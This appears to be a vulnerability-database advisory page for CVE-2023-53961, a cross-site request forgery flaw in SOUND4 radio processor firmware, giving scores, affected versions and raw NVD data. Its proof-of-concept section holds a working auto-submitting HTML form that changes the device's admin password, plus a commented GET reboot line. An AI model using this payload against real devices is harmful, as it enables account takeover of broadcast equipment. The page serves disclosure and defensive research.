Security Vulnerability Report
中文
CVE-2023-53961 CVSS 4.3 MEDIUM

CVE-2023-53961

Published: 2025-12-22 22:16:00
Last Modified: 2026-01-16 19:16:14
Source: [email protected]

Description

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages that submit HTTP requests to the radio processing interface, triggering unintended administrative operations when a logged-in user visits the page.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
SOUND4 IMPACT v2.x < 修复版本
SOUND4 FIRST v2.x < 修复版本
SOUND4 PULSE v2.x < 修复版本
SOUND4 Eco v2.x < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2023-53961 targeting SOUND4 IMPACT/FIRST/PULSE/Eco --> <!-- This PoC demonstrates CSRF attack to change admin password --> <!DOCTYPE html> <html> <head> <title>Sound4 Device CSRF PoC</title> </head> <body> <h1>CSRF Attack PoC - CVE-2023-53961</h1> <p>This PoC demonstrates CSRF vulnerability in SOUND4 IMPACT/FIRST/PULSE/Eco v2.x</p> <p>Submitting the form will attempt to change admin password without user's knowledge.</p> <!-- Auto-submit form to trigger CSRF attack --> <form id="csrfForm" action="http://TARGET_IP/admin/settings" method="POST" style="display:none;"> <input type="hidden" name="action" value="change_password"> <input type="hidden" name="username" value="admin"> <input type="hidden" name="new_password" value="AttackerPassword123"> <input type="hidden" name="confirm_password" value="AttackerPassword123"> <input type="hidden" name="csrf_token" value=""> </form> <script> // Auto-submit form when page loads window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> <p>If you see this message, the form was submitted.</p> </body> </html> <!-- Alternative: Image tag based CSRF (for GET requests) --> <!-- <img src="http://TARGET_IP/admin/reboot" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53961", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:00.367", "lastModified": "2026-01-16T19:16:13.567", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages that submit HTTP requests to the radio processing interface, triggering unintended administrative operations when a logged-in user visits the page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "E0699DEA-9CDA-4BB4-8FA3-6A6FADE1A61E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "051868AE-E364-4CB3-B927-42B4E0C19D01"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.